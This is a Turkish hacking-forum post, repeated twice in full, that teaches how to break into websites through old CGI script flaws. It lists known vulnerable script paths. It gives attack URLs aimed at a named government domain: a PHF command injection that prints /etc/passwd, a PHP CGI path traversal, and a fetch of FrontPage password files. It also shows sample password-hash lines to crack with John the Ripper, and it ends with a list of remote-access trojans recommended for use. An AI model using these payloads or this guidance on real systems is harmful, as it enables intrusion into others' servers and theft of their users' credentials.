deltanyum
Banned
- Katılım
- 9 Tem 2005
- Mesajlar
- 219
- Reaction score
- 0
- Puanları
- 0
Web Hack
Web sitelerini CGI açıklarından faydalanarak kırmanın iki yolu vardır.
1-) Yol: Bilindik CGI'ları browser'ımızın adres satırına yazarak manuel olarak ararız. Bilindik CGI ve diğer script açıkları şöyle:
aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML Script > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwshell.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl
2-) Yol: Manuel olarak aramak yerine işimizi kolaylaştırmak için bir CGI Scanner kullanabiliriz. Not: CGI'ları aradığınız sitede bulursanız bunu çalıştıran exploit'i de bulmanız gerekir.
Şimdi diyelim ki iki yoldan birini kullanarak PHF açığını bulduk. Bunu şöyle kullanırız: http://www.mit.gov.tr/cgi-bin/phf?Qalias=x /bin/cat /etc/passwd
yazarız (adres örnek olarak yazılmıştır. Herhangi bir art niyet yoktur;o))
Tabii çıkan dosya etc içindeki username ve password'lerin olduğu password dosyası olacaktır. Şu şekilde:
slasher:VTNaA6DjT/9ME:1603:100:,[email protected],,:/home/slasher:/bin/bash\par
mcgreen:ryKOFkUDiGO3A:1604:100:,[email protected],,:/home/mcgreen:/bin/bash\par
abi98:cUp.uUzNzr8YY:1605:100:,[email protected],,:/home/abi98:/bin/bash\par
henner_:ziprJNh85rk.o:1606:100:,[email protected],,:/home/henner_:/bin/bash\par
Çıkan password'ları bir password cracker ile kırabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardımıyla hack etmek istediğimiz sayfada service.pwd varsa ne yapacağız?
http://www.mit.gov.tr/_vti_pvt/services.pwd
yazarız.
İşte bir de PHP CGI örneği:
http://www.mit.gov.tr/cgi-bin/php.cgi?../../../etc/passwd
Bu örneklere bakarak olayın mantığını biraz da olsa kavrayabilirsiniz. Bug'ı bulduktan sonra exploit'ini bulup veya yazıp çalıştırmanız gerek. Bu da size kalmış...
aşagıdaki programları bulup uygulayabilirsiniz herhang
i biri ile
Trojanlar
» Subseven 2.2
» Subseven Gold
» Subseven 2.1
» Subseven 2.0
» Netbus 2.0
» Netbus 1.7
» Netbus 1.6
» Scrolbus 2.1
» Evil Ftp
» Donald dick Trojan
» Truva Ati 1.2
» Bo Trojan
» Bo 2000
» Millenium Trojan
» Doly 1.7
» Deltasource 1.7
» Backdoor
» Hackattack
» Wincrash
» Senna Spy
» Master Paradise
» Backoffice
» Vampire12
» NokNok5
» Paradise
» Netspy
Web sitelerini CGI açıklarından faydalanarak kırmanın iki yolu vardır.
1-) Yol: Bilindik CGI'ları browser'ımızın adres satırına yazarak manuel olarak ararız. Bilindik CGI ve diğer script açıkları şöyle:
aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML Script > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwshell.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl
2-) Yol: Manuel olarak aramak yerine işimizi kolaylaştırmak için bir CGI Scanner kullanabiliriz. Not: CGI'ları aradığınız sitede bulursanız bunu çalıştıran exploit'i de bulmanız gerekir.
Şimdi diyelim ki iki yoldan birini kullanarak PHF açığını bulduk. Bunu şöyle kullanırız: http://www.mit.gov.tr/cgi-bin/phf?Qalias=x /bin/cat /etc/passwd
yazarız (adres örnek olarak yazılmıştır. Herhangi bir art niyet yoktur;o))
Tabii çıkan dosya etc içindeki username ve password'lerin olduğu password dosyası olacaktır. Şu şekilde:
slasher:VTNaA6DjT/9ME:1603:100:,[email protected],,:/home/slasher:/bin/bash\par
mcgreen:ryKOFkUDiGO3A:1604:100:,[email protected],,:/home/mcgreen:/bin/bash\par
abi98:cUp.uUzNzr8YY:1605:100:,[email protected],,:/home/abi98:/bin/bash\par
henner_:ziprJNh85rk.o:1606:100:,[email protected],,:/home/henner_:/bin/bash\par
Çıkan password'ları bir password cracker ile kırabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardımıyla hack etmek istediğimiz sayfada service.pwd varsa ne yapacağız?
http://www.mit.gov.tr/_vti_pvt/services.pwd
yazarız.
İşte bir de PHP CGI örneği:
http://www.mit.gov.tr/cgi-bin/php.cgi?../../../etc/passwd
Bu örneklere bakarak olayın mantığını biraz da olsa kavrayabilirsiniz. Bug'ı bulduktan sonra exploit'ini bulup veya yazıp çalıştırmanız gerek. Bu da size kalmış...
aşagıdaki programları bulup uygulayabilirsiniz herhang
i biri ile
Trojanlar
» Subseven 2.2
» Subseven Gold
» Subseven 2.1
» Subseven 2.0
» Netbus 2.0
» Netbus 1.7
» Netbus 1.6
» Scrolbus 2.1
» Evil Ftp
» Donald dick Trojan
» Truva Ati 1.2
» Bo Trojan
» Bo 2000
» Millenium Trojan
» Doly 1.7
» Deltasource 1.7
» Backdoor
» Hackattack
» Wincrash
» Senna Spy
» Master Paradise
» Backoffice
» Vampire12
» NokNok5
» Paradise
» Netspy
